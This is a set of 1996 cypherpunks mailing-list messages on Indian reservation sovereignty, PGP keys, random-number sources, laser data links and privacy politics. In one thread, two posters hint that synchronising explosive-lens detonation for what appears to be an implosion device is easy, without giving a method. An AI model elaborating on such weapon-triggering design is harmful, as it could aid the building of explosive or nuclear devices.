>Neat tricks. 
> 
>But until they're joined with a willingness to look at a wider range of 
>libertarian posts than the fragment that feeds your pet peeves, I reserve 
>the right to be impressed. 
 
Again, these seems to reflect your ability to reach conclusions about other
people's behavior based on no evidence. I have read numerous posts by
libertarians on the net; who has not! 
 
The issues I have responded to have usually centered on thigs like the mass
killings of civilians, murder, and hatred of other people based on issues
like race, ethnicity, nationality, and/or religion. 
 
You may consider these nothing more than my "pet peeves." This is your
right. But in an era of increasing global hatred over such issues I do not
think many would agree with your accessment of the relative weight of these
issues. 
 
You need not be impressed; I was not posting to impress you. 
 
> 
>And yes, this is off-topic. So this is all I have to say about it. 
> 
 
I think then that you posted one message too many. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 18 Feb 1996 09:36:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <m0tnr6N-0008zdC@pacifier.com>
Message-ID: <Pine.3.89.9602171939.A19910-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Feb 1996, jim bell wrote:

> BTW, I think I've already solved the problem of producing a few dozen 
> absolutely simultaneous trigger explosions (+/- 100 nanoseconds) around the 
> periphery at the lens foci, without using multiple electronic detonators.  
> (in fact, a single blasting cap would do nicely.)  "But the margins of this 
> book are too small to contain it"  Heh heh!

Actually, it's a quite simple problem to solve.  Tom Clancy used a rather 
more complicated method, but the idea was correct.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tnaggs@cddotdot.mikom.csir.co.za (Anthony Naggs)
Date: Sun, 18 Feb 1996 01:35:39 +0800
To: hkhenson@netcom.com (Keith Henson) (Keith Henson)
Subject: Re: (fwd) Fishman > Pest Control
In-Reply-To: <199602160751.XAA10419@netcom.netcom.com>
Message-ID: <m0tnqGY-000VXxC@cddotdot.mikom.csir.co.za>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I know there are services which can recover at least some of the data
> on a formated disk.  Does anyone have a pointer to them?  Keith Henson

OnTrack are one of the biggest data recovery companies in the US, there
are probably many others ... but some of the smaller operators are 
less well equipped with (software) tools ...
 
> PS, Please reply by email.  I used to read this list, but it has been
> some time since I was here.  I already asked the victum to quit using
> the disk.  

The biggest problem is that the guy has already re-installed DOS &
his wordprocessor, this has likely destroyed much of the residual
information about his disk layout *unless* the format operation left
'unformat' recovery information on the disk.  (Deliberate attackers
would likely know how to disable this.)


Regards,
--
Anthony Naggs	- Computer Security & Anti-Virus Engineer, CSIR, South Africa
Disclaimer: these are my personal views and opinions, and do not represent
	my employers; past, present or future.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 18 Feb 1996 03:47:43 +0800
To: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Subject: Re: Carrying the Bible an Offense?
In-Reply-To: <199602162012.MAA13658@darkwing.uoregon.edu>
Message-ID: <Pine.SUN.3.91.960217192524.9446A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Is it not possible in the US jurisdictions to mount private 
prosecutions?  There is a common law right to do so in England.  Indeed, 
before the Crown Prosecution Service was established in 1984 - a fine 
year for bad laws in this country - prosecutions were usually handled by 
the Police, and were in theory private prosecutions.  They are quite 
often started even now by private individuals; and the Attorney General 
has an old statutory authority to take them over or to stop them.  But I 
do remember a number of recent cases of private prosecution for murder.  
None of these, I think, has succeeded:  the reason the CPS refused to get 
involved was because of a lack of good evidence to get cases through the 
committal (grand jury) process.

If this right doesn't exist in American common law, I shall think far 
less of your laws than I have so far.

Sean Gabb
Editor
Free Life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 10:22:29 +0800
To: cypherpunks@toad.com
Subject: Re: Legal status of Indian Reservations and CDA
Message-ID: <ad4bc83401021004433d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 2/17/96, Michael Peponis wrote:
>If I remember correctly, are not American Indian reservations considered
>qusi-sovergin states under the law?
>
>If this is true, what would stop me from negotiating with some tribe to
>establish an ISP on the reservation and then placing whatever material I
>wanted
>on that site without fear of reprisals from the US goverment.
>
>After all, if they are a soveign state, decency is covered by whatever laws
>they have, if any, not the CDA.
>
>If this is true, the Indians get the benift of having state-of-the-art
>telecommunications in thier communities, plus residual job creation, and
>everyone else gets freedom of speech.

"Bingo."

Actually, not. Despite the Indian bingo parlors, look at what is lacking in
this model: brothels, money-laundering banks, hash parlors, etc. (Not that
there aren't whorehouses operating semi-openly on Indian lands, as
elsewhere, just that the fiction that Indian reservations are
quasi-sovereign is just that, a fiction. Recall the case of Native American
uses of peyote.)

Of course, this fiction of sovereignty has been useful for the intelligence
community when they wanted it: Wackenhut and related CIA companies used the
Cabazon Band of Indians lands near Indio, California to develop products
that are illegal to develop in the nominal United States...despite being
less than a mile from the main freeway linking LA and Palm Springs.

And I was told that certain microwave (Long Lines?) lines were deliberately
routed through Indian reservations, allowing NSA-GCHQ monitoring without
violating the "no domestic interception" fiction.

So, it might be possible to eventually push through an exemption to the CDA
that is somewhat analogous to the way some Indian reservations can have
gambling facilities that are otherwise forbidden, but I expect the court
battle would be a long one, and would need big money to pursue. (Gambling
got pushed through for obvious financial reasons, and perhaps because of
some judicious payoffs to local officials, courts, etc. Yet another
convenient fiction.)

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 18 Feb 1996 04:35:09 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Computer unmasks Anonymous writer...
In-Reply-To: <m0tncCE-0008xLC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960217194736.9446D-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I wish I could give more information on this matter than I have, but here 
goes.  In the early 80s, when I was at York Universiy, a friend of mine 
in the Mathematics Department took part in a statistical analysis of the 
Letters of Junius, which appeared anonyously in the Morning Advertiser in 
London in the early 1760s.  They were ascribed to almost every writer of 
the age, from Birke to Gibbon.  Macaulay was convinced on external 
evidence that they were by Philip Francis.  Byu analysing the Letters and 
other writings acknowledged by Francis, my friend assured me that 
Macaulay was right.

I believe that similar tests have been run on works ascribed to 
Shakespeare, though I don't know what conclusions were reached.  It would 
be interesting to be able to write software that could mimic a style.  I 
hope that won't happen, since it would strip me of what small advantage I 
have when writing.

Sean Gabb,
Editor
Free Life.

On Fri, 16 Feb 1996, jim bell wrote:

> At 09:20 AM 2/16/96 -0800, Alexander Chislenko wrote:
> >  I ran my essays through Word grammar checker a while ago,
> >and was surprised how stable the grammar statistics were.
> >Complexity of the text (grade level) was the same to the decimal point,
> >average length of sentences was consistent, etc.
> >People also use the same styles of smileys or *highlights*, make
> >consistent spelling errors, have their habits of indentation, etc.
> 
> What's the next step?  Writing a program which "fakes" somebody's style, right?
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 18 Feb 1996 09:27:34 +0800
To: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Subject: Re: Differnent Sizes of Public PGP Keys
In-Reply-To: <199602171821.KAA03934@mark.allyn.com>
Message-ID: <199602180102.UAA17980@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Key certificates also include signatures.  If you have many signatures
on your key, your key certificate can get very big.  For example, mine
is about 10k or more (I haven't checked recently) with all the
signature intact.

As for keysize, you can generate keys as large as 2048 bits with PGP
2.6.2; you just need to type "2048" when it asks you for a keysize.
Alternatively, you can type in any keysize you wish to use, rather
than using the default sizes.

I hope this helps.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sun, 18 Feb 1996 09:33:26 +0800
To: cypherpunks@toad.com
Subject: Re: Berkeley ftp site moved again?
Message-ID: <199602180108.UAA24273@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

s1018954@aix2.uottawa.ca wrote:
> 
> I've been unable to get through to ftp.csua.berkeley.edu
> and www.csua.berkeley.edu for the past two days.
> 
> Does anyone know if the site (and the cpunk archives with it)
> has moved or if it's just down? (I'd mail root, but what's the
> point if the machine's down?)
> 
> Sorry if I've missed this being mentioned before.

It's just down.

   - Ian
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSZ7+SoZzwIn1bdtAQE74QF+LpQ4ArMpxZXxCF0HjKDkoa2oW8vMGUgP
igMRtrhpScWkQOuAcXWun4/T+2hIHxCk
=dKmJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sun, 18 Feb 1996 12:26:15 +0800
To: cypherpunks@toad.com
Subject: Indian Reservations
Message-ID: <312698F2.777F@best.com>
MIME-Version: 1.0
Content-Type: text/plain


A indian reservation sure beats moving to the Turks and Caicos. 
Well maybe not the weather part, but anyway in recent times I 
believe that several local governments have challenged the indian 
gaming enterprises. I recall a report on NPR about a challenge in 
Deleware or New Hampshire by a group of townspeople that was on the 
edge of a reservation. The indians won the case and were allowed to 
continue. Because of the new wealth generated by the bingo parlors 
and poker tables, the various tribes have gotten lobbying power in 
Congress.
 So I think that indian reservation sovernignty has grown in recent 
years, and would be very intresting course to pursue.


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 11:10:11 +0800
To: cypherpunks@toad.com
Subject: Privacy and Information Disclosure
Message-ID: <ad4bd1be02021004811b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:57 PM 2/17/96, "A. Padgett Peterson P.E. Information Security"

>ps Tim was correct, believe I *registered* Libertarian that year - do remember
>   not getting invited to vote in any primaries.

Thanks for confirming/acknowledging this.

The larger point, not directed at Padgett is this: people voluntarily
reveal information about themselves, get themselves placed on mailing lists
for like-minded people (such as this list, or the Rose Growers of Alberta
list, etc.), etc., and then they complain that others are compiling data on
them!

The classic example is borrowing money, whether via a credit card (you did
know you're borrowing, didn't you?) or for a conventional bank loan. Most
people who borrow money and then repay the money _want_ this to be known to
other potential lenders...this is what a "credit rating" is all about. Of
course, those who borrow money and then don't repay it are anxious not to
have others know about this situation!

If you don't want to be on a Libertarian Party mailing list, don't register
officially as an LP member. If you don't want a record with the credit card
companies, don't use their credit cards. If you don't want to be a list of
people who buy sexual devices, don't buy them through the mail (or use
money orders, mail drops, etc.). And so on.

What I can't imagine anyone on this list wanting (though apparently some
percentage do want them) are laws which give the illusion of enhancing
privacy by taking away the rights of others. I say "illusion" because The
Ones Who Really Matter will still have the goods on you.

(The Lotus CD-ROM of addresses being the canonical example of this. It was
hailed as a great victory that "the Net" rallied to get Lotus to abandon
plans to sell this CD-ROM to me and thee, where in actuality it just meant
that the sales remained to direct marketers, law enforcement, and the like.
But the Ostrich Syndrome prevailed.)

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sun, 18 Feb 1996 12:32:40 +0800
To: cypherpunks@toad.com
Subject: Indian Reservations Redux
Message-ID: <31269A1D.5299@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a bit I turned up after a Alta Vista search.

http://www.wtp.net/bus-con/mimn/reservation.html

A sample from this page follows;
Why Indian Reservations Make Good Offshore
Manufacturing Sites for Foreign and Outside Investors

STATUS OF THE RESERVATION IN AMERICAN LAW
The reservation can be compared to as an Export Processing Zone. It 
represents an autonomous region
within the U.S.A.; wherein, Tribal law can stipulate the exemption 
from State taxes and from other laws
which otherwise exist in the State. The net result being... a cost 
savings to the investor


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sun, 18 Feb 1996 09:51:33 +0800
To: cypherpunks@toad.com
Subject: Re: Text of personal use exemption
Message-ID: <199602180126.UAA24366@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Michael Froomkin wrote:
> 
> http://www.law.miami.edu/~froomkin/personal-use.txt
> 
Interesting.  Note, however, the following proviso (123.27(a)(1)):

   (1) The software product(s) are to be used only on a simultaneously
temporarily exported Category XIII(b)(1) hardware product or a
simultaneously exported item on the Commerce Control List (CCL)

This seems to say a couple of things:

o I can't bring my copy of PGP or kerberos with me on a floppy,
  intending to use it abroad on a conveniently available computer; I must
  bring a computer with me.

o The computer I bring with me must be a Category XIII(b)(1) hardware
  product; that is, something that is illegal to export (now, except
  for personal use), or be on the CCL.

That second one seems weird.  Does the CCL have things like normal portable
computers on it?  Otherwise, this exemption seems pretty useless...

   - Ian
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSaALCoZzwIn1bdtAQHakAF+Lu9NxtqTvIobwT8epPPK/aWP38ldAO1m
zJpcRffvIUmcKjB+U+A2OxAnSFRGd6r7
=cvI8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ericd@shop.internet.net (Eric Davis)
Date: Sun, 18 Feb 1996 13:02:58 +0800
To: SINCLAIR  DOUGLAS N <dsmith@midwest.net (David E. Smith)
Subject: Re: Using lasers to communicate
Message-ID: <v02130501ad4c4a9c8e31@[205.179.23.30]>
MIME-Version: 1.0
Content-Type: text/plain



Woooa there....

Lasers are not exactly expensive or complicated....

Check out www.lasercomm.com. 4-15Mb/s lasers.
or Cannon 10-100Mb/s lasers.

I have installed these products *many* times and their setup and operation
is fast and efficient. (used to work for Interop)

Exmaple:
We used a pair of these, and MBONE, to provide a 2 way real time video
confrence link joining an IETF session between a room of
users at Japan Interop (local) and a group in Sweeden (IETF). The setup
a was last minute point to point Ethernet link from the confrence center
to a local hotel acress the road. We had 1.5 hours to perform ALL
of the work, from wiring both roofs, seting up the lasers, wiring
the internal hotel/confrence center, and setting up systems and projectors.
!!The Laser setup took about :15 minutes, tops!!

BTW: With this system the transmit "beam" is focused into a "spot" half
way between the sending and receiving units. The receiving unit
is tuned to look for that focused "spot". This means that there is a
very large (area wise) low power laser pattern behind each of the
receivers! With a sensitive enough receiver, it is possible to hear
this signal!

When you need to transport a data stream (1-155Mb/s) to a remote
site, this solution works out to be *MUCH* cheaper than leasing
circuits from bell, bypass folks, etc..

Another case in point: We (ISN) needed to transport a 100Mb/s (FDDI) between \
2 sites. Upon checking, the price of PacBell "dim" fiber was outrageous!
We had no MFS/TCG/etc fiber in the man hole to latch onto. The choice was
clear.

As for security, the bottom line is that encryption devices are cheap.

Last plus for these units is that most foreign countries do not prevent
the use of these point to point optical devices. This is not the case
for spread spectrum multipoint or microwave point to point radio devices.

Eric Davis



At 10:44 PM 2/17/96, SINCLAIR  DOUGLAS N wrote:
>> If you have a secure link you don't need encryption.  Arguably, the
>> converse is true; if you have secure encryption you don't need
>> a secure link.  Isn't the ability to transmit secure data over
>> insecure channels one of the primary justifications for encryption?
>>
>
>Of course.  My point, though I seem to have failed to state it,
>is that encryption is a cheap software thing while laser beams
>are expensive, complicated, and still not secure.

-------------------------------------------------------------
Eric Davis -- ericd@internet.net
Director, Information Systems
Internet Shopping Network -- http://www.internet.net/
415-846-7449 Voice -- 415-842-7415 Fax -- KD6HTO Radio
-------------------------------------------------------------
- One by one our rights are taken, One by one we loose our
- freedom. Step by step we're coming for them, One by one
- we're coming. - Inka Inka - Myth of the Machine - Step Back







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sun, 18 Feb 1996 13:16:14 +0800
To: cypherpunks@toad.com
Subject: Indian Reservations USC cites
Message-ID: <3126A024.7E6B@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, one last thing on indian reservations. There is a searchable 
database of the United States Code at the following address;

http://www.law.cornell.edu/uscode/25/

Title 25 covers Indians.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Sun, 18 Feb 1996 13:44:54 +0800
To: Sandy Harris <sharris@fox.nstn.ca>
Subject: Re: True random numbers
In-Reply-To: <86934.sharris@fox.nstn.ca>
Message-ID: <Pine.3.89.9602172008.A20838-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 17 Feb 1996, Sandy Harris wrote:

> Deranged Mutant  <wlkngowl@unix.asb.com> wrote:
> 
> >maruishi@netcom.com wrote:
> >> 
> >> I was trying to think of a way to come up with true random numbers...
> >> And knowing a bit of UNIX socket TCP/IP programming I made a small [..]
> >
> >I wouldn't trust the samples taken from networked sources.
> 
> Me neither, in general.
> 
> A possible exception: I wonder if the checksums on Ethernet or IP
> packets use a reasonably strong CRC algorithm. If so, they might be
> a decent source of randomness in an environment where you could be
> sure the Black Hats couldn't see them. e.g. using only packets from
> your own LAN, suitably protected by firewall & good administration.
>  
> >You're better
> >off with a kernel patch that samples from local sources directly like 
> >disk or keyboard timing variations... such patches already exist, with 
> >similar drivers developed for DOS and OS/2 systems as well.
> 
> I'd be more inclined to hash the kernel's internal tables, e.g. process
> & file descriptor tables. These should vary quite a lot & if the enemy
> can see them, random number quality is the least of your worries.
> 
> RFC 1750 is a good reference on this problem.
>  --
>  Sandy Harris
>  sharris@fox.nstn.ca
> 

Although using other networks probably isn't as safe as using your own LAN,
.....
If you send the packets across the US then there are more variables to
determine time they took to get back. This is obviously becuase each
and every machine in between well vary in speed, line connections etc...
And the timing even on the same machine well change, because of CPU laod
etc..

Maybe another "random" source XORed with this?
I don't know, just a though.

maruishi@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 18 Feb 1996 13:59:10 +0800
To: <cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <199602180459.UAA02275@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:25 PM 2/17/96 -0400, Sandy Harris wrote:
>A possible exception: I wonder if the checksums on Ethernet or IP
>packets use a reasonably strong CRC algorithm.

The algorithm used with IP packets isn't even particulary good for error
detection.  It was designed for easy computation on slow, narrow chips.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 18 Feb 1996 14:03:38 +0800
To: SINCLAIR  DOUGLAS N <dsmith@midwest.net (David E. Smith)
Subject: Re: Using lasers to communicate
Message-ID: <199602180459.UAA02278@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 PM 2/17/96 -0500, SINCLAIR  DOUGLAS N wrote:
>> If you have a secure link you don't need encryption.  Arguably, the
>> converse is true; if you have secure encryption you don't need
>> a secure link.  Isn't the ability to transmit secure data over
>> insecure channels one of the primary justifications for encryption?
>> 
>
>Of course.  My point, though I seem to have failed to state it,
>is that encryption is a cheap software thing while laser beams
>are expensive, complicated, and still not secure.

Ah yes, but software without hardware doesn't do much.  Wires are
expensive, and in many places you can't string them across public
right-of-ways.  The distance from my house to my neighbor across the street
is less than 200 feet.  I suspect some form of optical link would work
fairly well.  I also think it would be hard to tap.

I think my point is, don't throw something out of your tool bag just
because you can't use it everywhere.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 18 Feb 1996 14:04:39 +0800
To: cypherpunks@toad.com
Subject: Re: Legal status of Indian Reservations and CDA
Message-ID: <199602180459.UAA02282@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:03 PM 2/17/96 +0000, Michael Peponis wrote:
>If I remember correctly, are not American Indian reservations considered 
>qusi-sovergin states under the law?
>
>If this is true, what would stop me from negotiating with some tribe to 
>establish an ISP on the reservation and then placing whatever material I
>wanted 
>on that site without fear of reprisals from the US goverment.

In the last Indian war (the Modoc war), the Indian leaders were hanged as
common criminals when the war was over.  The current law allows small sins
on the reservation.  I suspect that if you tried to sell porn from a
reservation or thru the mail you would find out the limits of Indian
nationhood.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 18 Feb 1996 14:28:59 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <m0to1K0-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:13 PM 2/17/96 +0000, Ed Carp wrote:
>On Sat, 17 Feb 1996, jim bell wrote:
>
>> BTW, I think I've already solved the problem of producing a few dozen 
>> absolutely simultaneous trigger explosions (+/- 100 nanoseconds) around the 
>> periphery at the lens foci, without using multiple electronic detonators.  
>> (in fact, a single blasting cap would do nicely.)  "But the margins of this 
>> book are too small to contain it"  Heh heh!
>
>Actually, it's a quite simple problem to solve.  Tom Clancy used a rather 
>more complicated method, but the idea was correct.
>--
>Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com

You might be surprised:  I have never read anything by Clancy.  Tell me,
what method did HE use?

Jim Bell, N7IJS

jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSayU/qHVDBboB2dAQF6rQP9F3LRvxn5bSu4MQqlyfy8AjgEkef5csyV
kwRIYSJn4A0LmMJSzb+lfuAG5wyOQ26HsTXChmojfpjaY5cdXnPSmYhfwxUPqFPX
33Ymjm/Nd+AROIrd/nqlc8Vib9aqtaJP6oXdN9m30xwVXCok3HwPYWVac24aqh5R
+gDvMsxrAWE=
=MMYU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sandy Harris" <sharris@fox.nstn.ca>
Date: Sun, 18 Feb 1996 10:47:16 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <86934.sharris@fox.nstn.ca>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant  <wlkngowl@unix.asb.com> wrote:

>maruishi@netcom.com wrote:
>> 
>> I was trying to think of a way to come up with true random numbers...
>> And knowing a bit of UNIX socket TCP/IP programming I made a small [..]
>
>I wouldn't trust the samples taken from networked sources.

Me neither, in general.

A possible exception: I wonder if the checksums on Ethernet or IP
packets use a reasonably strong CRC algorithm. If so, they might be
a decent source of randomness in an environment where you could be
sure the Black Hats couldn't see them. e.g. using only packets from
your own LAN, suitably protected by firewall & good administration.
 
>You're better
>off with a kernel patch that samples from local sources directly like 
>disk or keyboard timing variations... such patches already exist, with 
>similar drivers developed for DOS and OS/2 systems as well.

I'd be more inclined to hash the kernel's internal tables, e.g. process
& file descriptor tables. These should vary quite a lot & if the enemy
can see them, random number quality is the least of your worries.

RFC 1750 is a good reference on this problem.
 --
 Sandy Harris
 sharris@fox.nstn.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 18 Feb 1996 14:29:21 +0800
To: cypherpunks@toad.com
Subject: Counting bits Fast
Message-ID: <ad4c6912010210040488@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I hear that there may be those out there burning many compute cycles
counting one bits in piles of data.  There is code at
http://www.MediaCity.com/~norm/Hamming.html
that might provide a factor of ten over more obvious bit counting code.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sun, 18 Feb 1996 11:20:31 +0800
To: mianignad@outlook.net
Subject: Re: Remailers Pose Risk
Message-ID: <199602180259.VAA06534@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Pitty the author of that article won't see replies to it on the list.

> From:          "Michael Peponis" <mianigand@unique.outlook.net>
> To:            cypherpunks@toad.com, wlkngowl@unix.asb.com
> Date:          Sat, 17 Feb 1996 18:03:09 +0000
> Subject:       Re: Remailers Pose Risk
[..]
> Oh Boo Hoo, the moral decay of society, that is your problem shithead, not 
> mine, some of us survive no matter what happens to the rest of you.
> Regards,
> Michael Peponis
> PGP Key Avalible form MIT Key Server,or via finger
 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 18 Feb 1996 11:37:54 +0800
To: cypherpunks@toad.com
Subject: MIT Keyserver (at pgp@pgp.mit.edu) Mostly Operational
Message-ID: <9602180318.AA22007@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
alt.security.pgp)

-----BEGIN PGP SIGNED MESSAGE-----

The keyserver running at pgp@pgp.mit.edu is once again operational. It is
using new keyserver software. The old keyserver software was a collection
of perl scripts that invoked PGP to do its key management. The new server
is written in "C" and does its own key management, complete with appropriate
indices.

Not all email commands are implemented. However "GET", "ADD" and "INDEX" (when
given an argument to look for) do work. Response is immediate (plus or minus
e-mail delays).

The best on-line way to use the keyserver is via the World Wide Web at:

   http://bs.mit.edu:8001/pks-toplev.html

Enjoy.

                                  -Jeff



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSaaCcUtR20Nv5BtAQF76wQAmsuF4t43zIaNjW1lZS9fhYr/3UjIHqVT
V3jMSJ5W3gsEWkHzigP2VY5tfduiC4oQJOaGaHFSSI6jkhEFTpjOvVMIe6ye/GKh
pqiXNm/wBef4EFQ+NqKjPc/TW28odVGR50A5kneI/tyOjAYrFzetakOUlBeq+Qrv
1e4OamD65fo=
=FyXc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 18 Feb 1996 12:04:47 +0800
To: dsmith@midwest.net (David E. Smith)
